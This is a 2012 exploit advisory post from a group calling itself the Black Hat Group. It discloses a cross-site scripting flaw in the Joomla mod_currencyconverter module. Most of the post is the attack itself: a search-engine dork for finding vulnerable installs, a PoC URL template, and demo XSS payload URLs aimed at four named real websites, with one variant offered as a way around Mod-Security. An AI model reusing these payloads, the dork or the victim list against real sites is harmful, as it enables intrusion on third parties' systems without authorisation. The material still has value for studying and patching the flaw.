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Joomla Currency Converter Cross Site Scripting

Posted on 02 February 2012

# Exploit Title: Joomla modules (mod_currencyconverter) XSS Vulnerability # Date: 2012-02-02 [GMT +7] # Author: BHG Security Center # Software Link: http://joomla.org # Dork: inurl:/includes/convert.php?from= # Tested on: ubuntu 11.04 # CVE : - ----------------------------------------------------------------------------------------- Joomla modules (mod_currencyconverter) XSS Vulnerability ----------------------------------------------------------------------------------------- Author : BHG Security Center Date : 2012-02-02 Location : Iran Web : http://Black-Hg.Org Critical Lvl : Medium Where : From Remote My Group : Black Hat Group #BHG --------------------------------------------------------------------------- PoC/Exploit: ~~~~~~~~~~ ------------- ( Cross Site Scripting ) ~ ~ [PoC] ~: Http://[victim]/path/modules/mod_currencyconverter/includes/convert.php?from=[XSS] ------------- ( Demo Vulnerability ) ~ Demo : http://www.sarafitehran.com/modules/mod_currencyconverter/includes/convert.php?from="><script>alert(0)</script> Demo : http://www.bhinnekatv.com/2K9/modules/mod_currencyconverter/includes/convert.php?from='>><marquee><h1>Pentest</h1></marquee> Demo : http://www.turismoeducativo.com/site/modules/mod_currencyconverter/includes/convert.php?from='>><marquee><h1>Pentest</h1></marquee> Demo : http://www.businessdayonline.com/modules/mod_currencyconverter/includes/convert.php?from="><script>alert(0)</script> Note: URL encoded GET input aonvert.php?from= was set to '>><marquee><h1>Pentest</h1></marquee> [For Bypass Mod-Security] Timeline: ~~~~~~~~~ - 29 - 01 - 2012 bug found. - 01 - 02 - 2012 vendor contacted, but no response. - 02 - 02 - 2012 Advisories release. --------------------------------------------------------------------------- Greetz To:A.Cr0x | 3H34N | Cru3l.b0y | ArYaIeIrAN | NoL1m1t | G3n3Rall Spical Th4nks: B3hz4d | Mr.XHat | _SENATOR_ | md.r00t And All My Friendz [!] Persian Gulf 4 Ever [!] I Love Iran And All Iranian People Greetz To : 1337day.com ~ exploit-db.com [Pentesters.ir] And All Iranian HackerZ -------------------------------- [ EOF ] ----------------------------------